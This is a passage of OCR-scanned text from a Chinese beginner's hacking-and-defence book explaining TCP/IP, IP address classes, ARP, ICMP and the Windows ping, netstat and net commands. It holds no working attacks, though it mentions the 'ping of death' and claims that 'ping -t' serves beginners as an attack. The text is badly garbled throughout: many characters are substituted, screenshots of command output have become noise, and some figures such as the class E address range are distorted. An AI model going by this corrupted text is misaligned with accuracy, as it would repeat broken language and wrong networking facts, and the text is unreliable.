还 包括 许多 别 的 协议 ， 它们 共同 组 成 了 TCP/P 协议 复 。 其 中 比较 重要 的 有 SLIP 协议 、PPP 
协议 、 卫 协议 、ICMP 协议 、ARP 协议 、TCP 协议 、UDP 协议 、FTP 协议 、DNS 协议 和 
SMTP 协议 等 。 









































13.2 下 协议 


IP 协议 是 为 计算 机 网 络 相互 连接 进行 通信 而 设计 的 协议 。 在 因特网 中 ， 可 以 使 连接 到 
网 上 的 所 有 计算 机 网 络 实现 相互 通信 ， 同 时 还 规定 了 计算 机 在 因特网 上 进行 通信 时 应 当道 
守 的 规则 。 任 何 厂 家 生产 的 计算 机 系统 ， 只 有 遵守 该 协议 才 可 以 与 因特网 互 连 互通 。 

IP 地 址 束 是 给 每 个 连接 在 Internet 上 的 主机 分 配 的 一 个 32bit 的 地 址 。 每 台 联 网 的 计算 
机 都 依靠 IP 地 址 来 标识 自己 。 这 种 唯一 的 地 址 ， 才 保证 了 用 户 在 联网 的 计算 机 上 操作 时 ， 
能 够 高 效 而 且 方 便 地 从 于 千 万 万 台 计 算 机 中 选 出 目 己 所 需 的 对 象 。 

(1) IP 地 址 的 基本 格式 

按照 TCP/PP 协议 规定 ， 了 地 址 用 二 进 制 来 表示 ， 每 个 IP 地 址 长 32bit， 把 比特 换算 成 
学 六， 驶 是 4 个 字 节 。 例 如 ， 一 个 采用 二 进 制 形式 的 IP 地 址 是 “0000101000000000000000 
0000000001”， 这 么 长 的 地 址 处 理 起 来 也 太 费 劲 了 。 为 了 方便 使 用 ， 卫 地 址 经 常 被 写成 4 
个 十 进 制 的 数 ， 不 同 的 字 节 中 间 使 用 符号 “.” 分 开 。 于 是 ， 上 面 的 IP 地 址 可 以 表示 为 
“10.0.0.1”。 卫 地 址 的 这 种 表示 法 叫做 “点 分 十 进 制 表示 法 ”这 显然 比 1 和 0 容易 记忆 得 
多 。 这 种 表示 方法 称 作 “点 分 十 进 制 表 示 法 ” 了 地 址 格式 : 网 络 地 址 + 主机 地 址 或 网 络 地 
址 + 子 网 地 址 + 主机 地 址 。 

(2) IP 地 址 分 配 

在 互联 网 中 的 每 个 接口 都 有 一 个 唯一 的 卫 地 址 与 其 对 应 ， 该 地 址 并 不 是 采用 平面 形式 的 
地 址 空间 ， 而 是 具有 一 定 的 结构 。 一 般 情况 下 ，IP 地 址 可 分 为 5 大 类 ， 具 体 结构 如 下 图 所 示 。 


es 







































































< 全 第 1 章 


从 零 开 始 认 识 黑 客 
7 位 24 位 
A 类 [0 | M3 | 
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21 位 8 位 

C 类 [1|1ol 网 络 号 。 | 主机 号 | 

28 位 
D 类 [1|1|1|0| 多 播 组 号 

27 位 
E 类 [IIol (留待 后 有 ”| 
|P 地 址 分 类 





从 图 中 不 难得 出 如 下 结论 : 

在 A 类 中 , 第 1 段 为 网 络 位 , 后 3 段 为 主机 位 ， 其 苑 围 为 1 一 127， 如 127.255.255.255。 

在 B 类 中 ,六 2 段 是 网 络 位 ,后 2 段 为 主机 位 , 其 范围 为 128 一 191, 如 191.255.255.255。 

在 C 类 中 , 前 3 上段 为 网 络 位 , 后 1 工段 为 主机 位 , 其 范围 为 192 一 223,， 如 223.255.255.25。 

D 类 地 址 用 于 多 播 ,也 叫 组 播 地 址 ,在 互联 网 上 不 能 作为 接点 地 址 使 用 , 其 范围 为 224 一 
239， 如 239.255.255.255。 

E 类 地 址 用 于 科学 研究 ， 也 不 能 在 互联 网 上 使 用 ， 其 范围 为 240 一 254。 



































13.3 ARP 协议 


ARP 协议 (Address Resolution Protocol， 地 址 解析 协议 ) 的 主要 作用 是 通过 目标 设备 
的 IP 地址， 查询 目标 设备 的 MAC 地址， 以 保证 通信 的 顺利 进行 。ARP 协议 将 局 域 网 中 
的 32 位 IP 地 址 转换 为 对 应 的 48 位 物理 地 址 ， 即 网 卡 的 MAC 地 址 ， 如 IP 地 址 是 
192.168.0.10， 而 网 卡 MAC 地 址 为 00-1B-7C-17-B0-79， 整 个 转换 过 程 是 一 台 主 机 先 向 
目标 主机 发 送 包含 耻 地址 和 MAC 地 址 的 数据 包 ,， 再 通过 MAC 地 址 连接 两 台 主 机 , 束 可 








以 实现 数据 传输 了 。 
1. ARP 工作 原理 
计算 机 相互 通信 ， 实 际 上 是 互相 解析 对 方 的 MAC 地 址 。 其 具体 的 操作 步骤 如 下 。 








1) 每 台 主 机 都 会 在 自己 的 ARP 绥 冲 区 中 建立 一 个 ARP 列表 , 来 表示 IP 地 址 和 MAC 
地 址 的 对 应 关系 。 

2) 当 源 主机 需要 将 一 个 数据 包 发 送 到 目的 主机 时 ， 会 检查 自己 ARP 列表 中 是 否 存在 
该 卫 地址 对 应 的 MAC 地 址 。 如 果 存 在 ， 则 将 数据 包 发 送 到 这 个 MAC 地 址 ; 如 果 不 存 在 ， 
束 回 本 地 网 段 友 起 一 个 ARP 请 求 的 广播 包 ,， 来 得 询 此 目标 主机 对 应 的 MAC 地 址 。 此 ARP 
请 求 数据 包 里 包括 源 主机 的 IP 地 址 、 硬 件 地 址 ， 以 及 目的 主机 的 也 地 址 。 

3) 网 络 中 所 有 的 主机 收 到 这 个 ARP 请 求 后 ,会 检查 数据 包 中 的 目的 IP 地 址 是 否 和 目 
己 的 IP 地 址 相同 。 如果 不 相同 , 束 忽 略 此 数据 包 ; 如 果 相 同 ， 访 主机 首先 将 发 送 端的 MAC 
地 址 和 IP 地 址 添加 到 目 己 的 ARP 列表 中 。 

4) 如 果 ARP 表 中 已 经 存在 该 IP 地 址 的 信息 ， 则 将 其 敢 闸 ， 然 后 给 源 主 机 发 送 一 个 
ARP 啊 应 数据 包 ， 告 诉 对 方 自己 是 它 需 要 查找 的 MAC 地址 。 
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5) 当 源 主机 收 到 这 个 ARP 啊 应 数据 包 后 ， 将 得 到 的 目的 主机 的 IP 地址 和 MAC 地 址 
添加 到 目 己 的 ARP 列表 中 ， 并 利用 此 信息 开始 数据 的 传输 。 

2. 查看 ARP 缓存 表 

在 每 台 计 算 机 中 都 保存 看 一 个 ARP 绥 存 表 ， 其 中 记录 了 局 域 网 中 其 他 IP 地 址 对 应 的 
MAC 地 址 ， 以 便 访问 到 正确 的 IP 地 址 。ARP 绥 存 表 是 可 以 得 看 的 ， 也 可 以 对 其 进行 删除 。 
在 “命令 提示 符 ” 窗 口中 输入 “arp-a” 命 令 可 以 查看 ARP 绥 存 表 中 的 内 容 ， 而 用 “arp-d” 
命令 可 以 删除 ARP 绥 存 表 中 所 有 的 内 容 。 
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郴 管理 员 : C:\Windows\system32\cmd.exe 


icrosoft Windows [jh 中 6.1.7?681] Se 
入 可 所 有 Cc》 2889 Microsoft Corporation。 尿 贸 所 有 相生 


本 管理 员 : C:\Windows\system32\cmd.exe 
91-09-5e 一 7"a-3e 一 "3 
5 
61-88-5e-@bh-61-—d3 
a 


dministrator2arp -a 1-@0-5e-6 


G1-@0-5e-5 5 
G1-@0-5e-63—: Pe 


关口 : 192.168.1.10 @xh 
ternet 地 物理 地 址 

SQ 8c—21- -Qa -89—ae-h6 
92.168.1.2 99-2h-34-@9 污 49 
92.168.1.15 9 一 ?6 

92 .168 -1-55 
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2.168-1-199 
92.168 -1.-163 
92.168. i 187 


[5 Be | 
G1-@0-S5e-@f 一 78 
8B1-99-5e-12-99 一 7 
让 寺 证 下 和风 9 邮 日 


ator>arpD -d 


上 
61-00-5e-00-006-16 
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查看 ARP 缓 存 表 中 的 内 容 删除 ARP 缓 存 表 中 所 有 的 内 容 











1.3.4 ICMP 协议 


ICMP (Internet Control Message Protocol，Internet 控制 消息 协议 ) 是 TCP/P 协议 秘 中 
的 子 协议 ， 主 要 用 于 查询 报 文 和 差错 报 文 。ICMP 报 文通 常 被 IP 层 或 更 高 层 协议 〈TCP 或 
UDP) 使 用 ; 一 些 ICMP 报 文 把 差错 报 文 返回 给 用 户 进程 。 通 过 卫 包 传 送 的 ICMP 信息 主 
要 用 于 涉及 网 络 操作 或 错误 操作 的 不 可 达 信 息 。ICMP 包 发 送 是 不 可 靠 的 ， 所 以 主机 不 能 
依靠 接收 ICMP 包 解 决 任何 网 络 问题 。 

ICMP 的 主要 功能 如 下 。 

1. 发 现 网 络 错误 

ICMP 可 以 发 现 某 台 主 机 或 整个 网 络 由 于 某 些 故障 而 不 可 达 的 错误 。 

2. 通告 网 络 拥塞 

当 路 由 器 绥 存 了 太 多 数据 包 时 ， 由 于 传输 速度 无 法 达到 它们 的 接收 速度 ， 将 会 生成 
ICMP 源 绪 束 信 息 。 对 于 发 送 者 ， 这 些 信息 将 会 导致 传输 速度 降低 。 当 然 ， 更 多 ICMP 信息 
生成 也 将 引起 更 多 的 网 络 拥 考 。 

3. 协助 解决 故障 

ICMP 文 持 echo 功能 ， 即 在 两 全 主机 间 的 一 个 往返 路 径 上 发 送 一 个 数据 包 。Ping 命令 
是 一 种 基于 这 种 特性 的 通用 网 络 管理 工具 ， 它 将 传输 一 系列 的 包 ， 测 量 平 均 往 返 次 数 并 计 
息 去 大 下 分 比 ， 

4. 通告 超时 

如 果 一 个 IP 包 的 TIL (Time To Live， 生 存 时 间 值 ) 降低 到 零 ， 路 由 器 就 会 丢 径 此 包 ， 
这 时 会 生成 一 个 ICMP 包 通 告 这 一 事实 。TraceRoute 是 一 个 工具 ， 它 通过 发 送 小 TTL 值 的 
包 及 监视 ICMP 超时 通告 可 以 显示 网 络 路 由 。 
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从 零 开始 认识 黑客 








其 实在 网 络 中 经 常会 使 用 到 ICMP 协议 ， 只 是 用 户 觉 聚 不 到 而 已 。 比 如 经 党 使 用 的 用 
于 检查 网 络 通 不 通 的 ping 命令 ， 这 个 “Ping” 的 过 程 实 际 上 就 是 ICMP 协议 工作 的 过 程 。 
还 有 其 他 的 网 络 命 令 ， 如 跟踪 路 由 的 tracert 命令 ， 也 是 基于 ICMP 协议 的 。 

ICMP 协议 对 于 网 络 安全 具有 极其 重要 的 意义 。ICMP 协议 本 喘 的 特点 决定 了 它 非 常 容 
多 航 用 于 攻击 网 络 上 的 路 由 规 和 主机 。 可 以 利用 操作 系统 规定 的 ICMP 数据 包 最 大 尺寸 不 
超过 64KB， 问 主机 发 起 “ping of Death”( 死 亡 之 ping) 攻击 。 























1.4 ”黑客 音 用 命 倒 


141 测试 物理 网 络 的 ping 命令 


ping 命令 是 测试 网 络 连 接 、 信 息 发 送 和 接收 状况 的 实用 型 工具 ， 是 一 个 系统 内 置 的 探 
测 工 具 。 对 于 一 个 生活 在 网 络 上 的 管理 员 或 黑客 ,ping 命令 是 第 一 个 必须 掌握 的 DOS 命令 。 
它 所 利用 的 原理 是 : 网 络 上 的 机 器 都 有 唯一 确定 的 IP 地 址 ， 用 户 给 目标 IP 地 址 发 送 一 个 
数据 包 ， 对 方 束 要 返回 一 个 同样 大 小 的 数据 包 ， 根 据 返 回 的 数据 包 ， 用 尸 可 以 确定 目标 主 
机 的 存在 ， 可 以 初步 判断 目标 主机 的 操作 系统 等 。 通 过 在 命令 提示 符 下 输入 “ping /2” 命 
令 ， 即 可 查看 ping 命令 的 话 细 说 明 。 
ping [-t] [~al [-a count| [~1 size] [~f] {7-1 ttl] [~v tos| [~r count|] [-s count] [~] -Host list] | 
[~-k Host-list] [~-w timeout| destination—list 
参数 说 明 
@ -t: 不 断 使 用 ping 命令 发 送 回 啊 请 求 信息 到 目的 地 。 要 中 断 并 退出 ping 命令 ， 只 需 
要 按 《Ctrl+C) 组 合 键 。 初 级 黑客 第 第 喜欢 使 用 这 个 参数 对 目标 计算 机 进行 攻击 。 
@ -a: 指定 对 目的 卫 地 址 进行 反问 名 称 解析 。 如 解析 成 功 ，ping 命令 将 显示 相应 的 
主机 名 。 
@ -ncount: 指定 发 送 回 啊 请 求 消息 的 次 数 ， 默 认 值 为 4。 
@ -size: 指定 发 送 的 回 啊 请 求 消 息 中 “数据 ”字段 的 长 度 〈 以 字 节 表示)。 默 认 值 为 
32。size 的 最 大 值 是 65 527。 























管理 员 : C\Windows\system32\cmd.exe 
C:\Jsers\Wdmninistrator> 

CC:\Users dmninistrator> 

C:\Users dmninistrator2ping 192.168.1.255 


ize] [一 £] Co DEE 08) 
st] ! LR hosec—= Use 
Ee [-6] target_name 


来 自 192.168 . 1。 1 的 回复 复 : 末节 TTL-64 
来 自 192.168.1.1 的 加 : 字 节 
目 192.168 . 1 回 
的 回 


TTL=64 
ITL=64 
ITL=64 


司 局 已 再 
bb, 


1 lal bet 


192.168.1.255 的 Ping | 
数据 包 : 已 发 送 = 
往返 器 得 的 入 计 时 图 4 以 要 


卫生 = gns， 


< 仅 适 用 于 


艺 中 妈 i 


CGC:\Users dnministrator>s 





查看 ping 命令 的 详细 说 明 查看 数据 字 节 的 默认 长 度 
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2. 典型 示例 

(1) 检测 本 机 网 卡 驱 动 程序 以 及 TCP/P 协议 是 否 正常 

以 IP 地 址 为 192.168.1.255 为 例 ， 奎 想 检 测 本 机 的 网 卡 驱动 程序 以 及 TCP/P 协议 是 人 否 
正常 ， 只 需要 在 命令 提示 符 窗口 中 ， 输 入 “ping 192.168.1.255” 命 令 即 可 。 

(2) 多 参数 合用 检测 

在 命令 提示 符 窗 口中 输入 “ping -a -t192.168.1.255” 命 令 ， 即 可 对 192.168.1.255 这 人 台 














计算 机 进行 探测 .通过 反馈 信息 可 得 知 , 上 述 命令 中 的 参数 “-a” 检 测 出 了 该 机 器 的 NetBIOS 
名 为 dns.sq.js.cn; 参数 “-t” 实 现 不 断 癌 该 机 发 送 数据 包 。 


| 呆 管理 员 : C\Window A cmd.exe 


到 管理 员 : C\Windows\system32\cmd.exe 
取向 = gmns， 取 长 = gms， 平 区 = Bns 


Cc:Nsers\dministrator2ping 192.168.1.255 
isthatokh>ping i We 一 192-168-1.255 


正在 Ping 192.168.1.255 具有 32 字 节 的 数据 : 

来 自 192.168.1.1 的 回复 : 字 节 = =32 时 间 <tms TTL=64 
来 自 192.168.1.1 的 回复 : 守节 = =32 时 | 日 <lms TTL=64 
来 自 192.168.1.1 的 回复 : 守节 wp 


Ping 4L8QD1ETPGKUS1W [192.168.1.255] 三 了 = 四 
192.168.1.1 的 回复 : 32 时 | 本 <tms TTL=64 
192.168.1.1 的 回复 : 宇 节 -=32 时 | 本 <tms TTL=64 
192.168.1.1 的 回复 : 宇 节 =32 时 | 日 <ims TTL=64 
来 自 192.168.1.1 的 回复 : 字 节 =32 时 | 本 <lms TTL=64 192.168.1.1 的 回复 : 宇 节 -=32 时 [<ims TTL=64 
192.168-1-1 的 回复 : 宇 节 =32 时 | 日 <clims TTL=64 
192.168.1.1 的 回复 : 守节 =32 时 | 站 <lms TTL=64 
192 .168 .1. ] =32 时 | 昌 <tms TTL=64 
192.168 .1. 复 : 字 节 =32 时 | 本 <tms TTL=64 
192.168.1. 有 : 字 节 =32 时 [上 <ins TTL=64 
= 
了 -32 时 间 日 tms TTL=64 
I Bj<ims TTL=64 
| s TTL=64 
s TTL=64 


192.168.1.255 的 Ping 统计 信息 ,: _ 
a | 全 = 4， 于 和 失 = 8 C8@x 去 失 )》， 
往返 位 措 的 信 计 Er 
村 日 = 四 ms， 最 长 = 9nms 平均 = Bns 


同 加 各 呈 各 同 合生 器 呈 1 


gl 
olodels 


GC: “Users\fdministrator> 192.168.1. 


ob 


加 

自 

E 

来 目 

区 可 三 人 

门 加 D 并 下 只 三 至 二 全 
令 测 本 机 多 参数 合用 检测 计算 机 


通常 ，ping 命令 会 反馈 如 下 两 种 结果 : 

Q 请 求 超时 。 表 示 没 有 收 到 网 络 设 备 返 回 的 啊 应 数据 包 ， 也 束 是 说 网 络 不 通 。 出 现 这 
个 结果 的 原因 很 复杂 ， 通 常 有 对 方 装 点 有 防火 墙 并 禁 上 上 ICMP 回 显 、 对 方 已 经 关机 本 机 的 
IP 设置 不 正确 或 网 关 设 置 错误 、 网 线 不 通 等 几 种 可 能 。 

@) 来 自 192.168.1.255 的 回复 : 字 节 =32 时 间 <lms TTL=64。 表 示 网 络 畅 通 ， 探 测 
使 用 的 数据 包 大 小 为 32B， 响 应 时 间 小 于 lms。TTL (Time To Live， 存 活 时 间 ) 是 指 一 
个 数据 包 在 网 络 中 的 生存 期 ， 网 管 可 通过 它 了 解 网 络 环境 ， 辅 助 维护 工作 。 通 过 TTL 
值 可 以 粗略 判断 出 对 方 计算 机 使 用 的 操作 系统 类 型 , 以 及 本 机 到 达 目 标 主机 所 经 过 的 路 
由 数 。 

当 检 查 本 机 的 网 络 连 通 情 况 时 ， 通 常会 使 用 ping 命令 给 某 个 日 标 主机 (如 本 机 ) 发 送 
ICMP 数据 包 。 在 本 机 中 生成 ICMP 数据 包 时 ， 系 统 就 会 给 这 个 ICMP 数据 包 初 始 化 一 个 
TTL 值 ， 如 Windows 7 操作 系统 就 会 生成 “64”， 将 这 个 ICMP 数据 包 发 送出 去 ， 过 到 网 络 
路 由 设备 转发 时 ，TTL 值 束 会 被 减 去 “1”， 最 后 到 达 目 标 主机 ， 如 果 在 转发 过 程 中 TTL 值 
变 成 “0” 路 由 设备 就 会 丢弃 这 个 ICMP 数据 包 。 

TTL 值 在 网 络 应 用 中 很 有 用 处 , 可 以 根据 返回 信息 中 的 TTL 值 来 推断 发 送 的 数据 包 到 
达 目 标 主 机 所 经 过 的 路 由 数 。 路 由 发 生 在 OSI 网 络 参 考 模 型 中 的 第 三 屋 ， 即 网 络 层 。 


不 同 的 操作 系统 ， 它 的 TTL 值 也 是 不 相同 的 。 默 认 情 况 下 ，Linux 操作 系 
统 的 TTL 值 是 64 或 255，Windows NT/2000/XP 操作 系统 的 TTL 值 为 128， 
Windows 98 操作 系统 的 TIL 值 为 32,Windows7 操 作 系 统 的 TIL 值 是 64,UNIX 
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操作 系统 的 TTL 值 为 255。 
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1.4.2 查看 网 络 连 接 的 netstat 命令 


netstat 命令 是 一 个 监控 TCP/PP 网 络 的 非常 有 用 的 工具 ， 可 以 显示 路 由 表 、 实 际 的 网 络 
连接 ， 以 及 每 一 个 网 络 接口 设备 的 状态 信息 ， 可 以 让 用 户 得 知 目 前 都 有 哪些 网 络 连接 正在 
运作 。netstat 命令 用 于 显示 与 了 了 了、TCP、UDP 和 ICMP 协议 相关 的 统计 数据 ， 一 般 用 于 检 
验 本 机 各 端口 的 网 络 连 接 情 况 。 

如 果 计 算 机 有 时 候 接收 到 的 数据 包 导 致 出 错 数 据 或 故障 ， 不 必 感 到 奇怪 ，TCP/AP 可 以 
容许 这 些 类 型 的 错误 并 目 动 重 发 数据 包 。 但 如 果 累 计 出 错 情况 数目 占 到 所 接收 IP 数据 包 相 
当 大 的 百分比 ， 或 者 它 的 数 日 正 迅 速 增 加 ， 束 应 该 使 用 netstat 命令 查 一 查 为 什么 会 出 现 这 
人 和 

一 般 用 “netstat -na” 命 令 来 显示 所 有 连接 的 新 口 并 用 数字 表示 。 

1. 语法 

netstat [-al [-e] [-n| [-o] [~p Protocol] [~r] [-s] [Intervall 

2. 参数 说 明 

@ -a: 显示 所 有 活动 的 TCP 连接 以 及 计算 机 侦 听 的 TCP 和 UDP 端口 。 

-e: 显示 以 太 网 统计 信息 ， 如 发 送 和 接收 的 字 币 数 、 数 据 包 效 。 

-n: 显示 活动 的 TCP 连接 ， 但 只 以 数字 形式 表现 地 址 和 闹 口 号 ， 却 不 尝试 确定 
名 称 。 

-0: 显示 活动 的 TCP 连接 并 包括 每 个 连接 的 进程 ID (PID)。 可 在 Windows 任务 
管理 器 的 “进程 ”选项 卡 中 找到 基于 PID 的 应 用 程序 。 该 参数 可 以 与 -a、-n 和 -p 
结合 使 用 。 

@ -p Protocol: 显示 Protocol 所 指定 的 协议 的 连接 。 在 这 种 情况 下 ，Protocol 可 以 是 

TCP、UDP、TCPv6 或 UDPv6。 

@ -s: 按 协 议 显 示 统 计 信息 。 默 认 情 况 下 ， 显 示 TCP、UDP、ICMP 和 了 PP 协议 的 统计 

信息 。 

@ -tr: 显示 了 开路 由 表 的 内 容 。 访 参数 与 route print 命令 等 价 。 

@ Interval: 每 隔 Interval 秒 重 新 显示 一 次 选 定 的 信息 。 按 《Ctrl+C》 组 合 键 俘 止 重新 

显示 统计 信息 。 如 果 省 略 该 参数 ，netstat 将 只 打印 一 次 选 定 的 信息 。 

3. 典型 示例 

netstat 命令 可 显示 活动 的 TCP 连接、 计算 机 侦 听 的 端口 、 以 太 网 统计 信息 、IP 路 由 表 、 
IPv4 统计 信息 (对 于 IP、ICMP、TCP 和 UDP 协议 ) 以 及 IPv6 统计 信息 (对 于 IPv6、ICMPV6、 
通过 IPv6 的 TCP 以 及 通过 IPv6 的 UDP 协议 )。 使 用 时 如 果 不 带 参数 ，netstat 将 显示 活动 
的 TCP 连接 。 

下 面 再 介绍 儿 个 netstat 命令 的 应 用 实例 ， 有 其 体 如 下 。 

1) 在 要 显示 本 机 所 有 活动 的 TCP 连接 ， 以 及 计算 机 侦 听 的 TCP 和 UDP 端口 ， 则 应 
输入 “netstat -a” 人 命令， 如 下 堪 图 所 示 。 

2) 奉 要 显示 服务 器 活动 的 TCP/ 了 了 连接 ， 则 应 输入 “netstat -n” 命 令 或 “netstat” 命 令 
《不 带 任何 参数 )， 如 下 右 图 所 示 。 



























































国人 RY 四 > 
共 攻防 从 入 门 到 精通 


葬 管理 员 ; C:\Windows\system32\cmd,exe 


eg = Ue v 
rosoft Windows [所 本 6.1.?681] : vs [有 汽 本 6-1-?7691] 
虎 1 T 有 《Cc) 2069 Microsoft Corporation, 


DD es p= Rh 由 (cc) 280889 Microsoft Corporation 保留 所 有 本 + 双开 | ， 


三 | 
GC:\Users Administrator>netstat -a 

Sr 
震动 主 按 


协 说 地 外 部 地 址 状态 

TCP :80 4L89D1ETPGKU51W: LISTENING 四座 地 地 由 二 B 地 址 大 坊 
TCP .DB.B:135 4L89D1ETPGKU51W: LISTENING C 6.1:1962 27.8.9.1:182 ESTABLISHED 
TCP A .0.0.0:1025 4L8QD1ETPGKUS1Y: LISTENING C 27.9.6.1:1928 27.8.9.1:182 ABLISHED 
TCP -0B.0.0: 26 4L8QD1ETPGKU51U : LISTENING TC 27.8 :318: pr Bi ld? NABLISHED 
TCP 5 4L89QD1ETPGKU51W: LISTENING CG 27 :1932 -日 -1:183 ABLISHED 
TCP 0 D55 4L89D1ETPGKU51TUW: LISTENING | C 27.0.0.1:1070 9.0.1:107" ABLISHED 
TCP peT: 4L8QD1ETPGKUS1Y: LISTENING .1:10877 1 -8.1:10 A 
TCP 9.9.6 : 4L89D1ETPGKU5S1UW: LISTENING et 
TCP .9.9.0:338: 4L89D1ETPGKUS1W:6 LISTENING 2 i , es 
TCP 4L89D1ETPGKU5S1W: LISTENING A : 这 了 TIME WAIT 
TCP TEST LISTENING -证 D0 9 322 TIME_VRII 
TCP 4L89D1ETPGKU51W: LISTENING TC 27.0.0.1: 27.0.0. 22 TIME_WAIT 
TCP 4L89D1ETPGKU51W: LISTENING TC 27.0.0.1: 27.8.9. 322 TIME_WnIT 
TCP 4L8QD1ETPGKUS1W: LISTENING C 7 .9.0.1:1243 27.0.9.1:21322 TIMF_WAIT 
TCP 4L89D1ETPGKU51W: LISTENING 92 .168 .1.19:1945 23.125.69.299 :443 ESTABLISHED 
TCP 4L89D1ETPGKU51W: LISTENINC TC 2.168.1-19:1946 ) -69 .209 :443 ESTABLISHED 
TCP 


显示 本 机 所 有 活动 的 TCP 连 接 显示 服务 器 活动 的 TCP/IP 连 接 


3) 耕 要 显示 以 太 网 统计 信息 和 所 有 协议 的 统计 信息 ， 则 应 输入 “netstat -s -e” 命 令 ， 
如 下 左 图 所 示 。 
耕 要 检查 路 由 表 确 定 路 由 配置 情况 ， 则 应 输入 “netstat -rm” 命 令 ， 如 下 右 图 所 示 。 


管理 员 : C:\Windows\system32\cmd.exe 


加 
' 








回回 名 加 加 名 晤 











管理 员 : C:\Windows\system32\cmd.exe 


| 

11=--.-.30, 2b 34 "09 7 

491332416 Ss 6.20> 
4989508 

114963 -Ba O00 O06 O00 80 80 H0 eQ MI oft 18ATAP ee 


3.. 00 80 60 608 60 606 59 eB Teredo EE Pseudo-Interface 


8.69.6.9 .8.0. 4 292.168 .1.19 276 
127.8.8.8 A ;自由 127.8.6.1 
127-B-B-1 255.3? 25: 全 127.0.90.1 

127.255.255.255 255.2 255 t 127.8.8.1 
192-168 .1.9 2 192 .168 .1.19 
192.168-1.198 2 .255 .255 192 .168 .1.19 
192 .168-1-255 255.255.255.255 证 192 .168.1.10 
224.86.8.8 2 图- 加 -四 127.0.06.1 
224.8.8.8 248.8.08. 这 192 -168 .1.19 
255-255-255-255 255.255.255.255 SF 127.9.9.1 


显示 以 太 网 统计 信息 确定 路 由 配置 情况 








依 


1.4.3 ”工作 组 和 域 的 flet 命令 


net 命令 是 一 种 基于 网 络 的 命令 ， 该 命令 包含 了 管理 网 络 环境 、 服 务 、 用 户 、 登 录 等 大 
部 分 重要 的 管理 功能 。 第 见 的 net 命令 有 net view、net user、net use、net start、net stop、 


net share 等 。 


下 面 来 介绍 这 些 第 用 的 net 子 命 

1. netview 

作用 : 显示 域 列表 ， 计 算 机 列表 或 指定 计算 机 的 共享 资源 列表 。 

命令 格式 : net view [Ncomputernamel/domain[:domainname]]。 

@ 不 带 参 数 的 net view: 显示 当前 域 的 计算 机 列表 。 

@ \computername: 指定 要 查看 其 共享 资源 的 计算 机 名 称 ， 如 下 图 所 示 。 
@ /domain[:domainname]: 指定 要 但 看 其 可 用 计算 机 的 域 。 

2. netuser 


作用 : 添加 或 更 改 用 户 账 亏 或 显示 用 户 账 喜 信 息 。 该 命令 也 可 以 写 为 net users。 


命令 格式 : net user[username[password | *][options]][/domain]。 
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管理 员 : C\Windows\system32\cmd.exe 


Microsoft Windows [jh 本 6.1.7661] 
版 权 所 有 《<c> 28@9 


Microsoft Cokporation， 


C:Nsers\Administrator>CDh\ 


: EE 


C:\YNET UIEW \\ZKG 
7 


serJet Professional M1ii136 MFP Print 


HP LaserJet Professional ML136 MFP 


Disk 


查看 指定 计算 机 的 共享 资源 





< 第 1 章 
从 和 雪 开 始 认识 黑客 


保留 所 有 权利 。 





username {password|*!ladd[options|[/domain | 


username|/deletel[/domainl| 








@ 不 市 参数 的 net user: 得 看 计算 机 上 的 用 户 账号 列表 ， 如 下 左 钢 所 示 。 

@ username: 添加、 删除、 更 改 或 得 看 用 户 账 号 名 。 

@ password: 为 用 户 账 号 分 配 或 更 改 密 但 。 密 但 必须 满足 net accounts 命令 的 /minpwlen 
选项 的 密码 最 小 长 度 ， 最 多 可 以 有 127 个 字符 。 

















@ +: 提示 输入 密码 。 当 用 户 在 密码 提示 符 下 输入 密码 时 ， 密 码 显 示 为 一 串 *#。 
@ /add 和 /delete: 是 添加 和 删除 用 户 账 户 ， 如 下 右 图 所 示 。 


国 管理 员 : CNWWIindowsvsystem32Ncmd.exe 


GC:~ net user 


~\sM4L8QD1ETPGKU51W 的 用 户 帐 户 


Adninistrator 
和 全 -成 功 完 万 。 





查看 计算 机 上 的 用 户 账号 列表 
/domain: 在 计算 机 主 域 的 主 域 控 制 右 中 
执行 操作 。 
options: 摘 述 Windows 操作 系统 下 的 命 
信行， 


3. netuse 








作用 : 连接 计算 机 或 断 开 计算 机 与 共享 资 











源 的 连接 ， 或 显示 计算 机 的 连接 信息 。 
命令 格式 : net use [devicename | *][\com- 
putername\sharename[\volume|][password | *] 


[/user: [domainame\|usernamel|[/deletell[/persis- 





管理 抽 : C\Windows\system32\cmd.exe 


2“~>nett ULSEL asdq .add 


命令 成 功 完成 。 


CGC: ~>net user asd /delete 
他 令 成 功 完成 。 





添加 和 删 际 用 户 账户 


国 管理 员 : C\Windows\system32\cmd,exe 





取 RD Fn 
新 音 


售 人 他 他 


> 
攻防 从 入 门 到 精通 





tent: {yes | no!] 

不 市 参数 的 net use: 列 出 网 络 连接 ， 如 右 图 所 示 。 

4. net start 

作用 : 局 动 服务 或 显示 已 局 动 服务 的 列表 。 

命令 格式 : net start server 

不 带 参数 的 net start: 显示 已 打开 服务 ， 如 下 左 图 所 示 。 妆 需要 启动 一 个 服务 时 ， 只 需 
在 后 边 加 上 服务 名 称 就 可 以 了 ， 如 下 右 图 所 示 。 


郴 管理 员 : C:\Windows\system32\cmd.exe 

















国 管理 员 : CWindows\system32\cmd.exe 


C:、\>net start 


2 a Ds Windows 服 3 : 


Application Host Helper Service 


Background Intelligent Transfer Service 


Windows Process fictivation Service 
Windows Search 

Workstation 

World Wide Web Publishing Service 
“LServicePlatform 


王 动 防 知 


A A -了 do 
on - | pa ee 





显示 已 局 动 的 服务 启动 server 服 务 

S. net stop 

作用 : 集 止 Windows 网 络 服务 。 与 net start 命令 相反 ，net stop 命令 用 于 俘 止 Windows 
网 络 服 务 ， 如 下 左 图 所 示 。 

命令 格式 : net stop server 

6. net share 

作用 : 创建 、 删 际 或 显示 共 娃 资源 。 

命令 格式 : net share sharename=drive:path[/users:number | /unlimited][/remark:"text"] 

@ 不 种 参数 的 net share: 显示 本 地 计算 机 上 所 有 共享 资源 的 信息 ， 如 下 右 图 所 示 。 


管理 员 :; C'\Windows\system32\cmd,exe 

















国 管理 员 : CNWIindows\system32Ncmd ,exe 


CG:\>net share 


GC“2net stop SEFUer ruer 服务 正在 启动 . 
Seruer El 站 
Server 服务 已 成 功 停止 。 


I 


C:\Windows 
GC: sers 





停止 Server 服 务 本 地 计算 机 上 所 有 共享 资源 的 信息 
@ sharename: 共 诗 资源 的 网 络 名 称 。 
@ drive:path: 指定 共享 目 孙 的 绝对 路 径 。 
@ /user:number: 设置 可 以 同时 访问 共享 资源 的 最 大 用 户 数 。 
@ /unlimited: 不 限制 同时 访问 共享 资源 的 用 户 数 。 
@ /remark:"text": 添加 关于 资源 的 注释 ， 注 释文 字 用 引号 引 住 。 
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1.4.4 ”23 总 口 登录 的 telnet 命令 


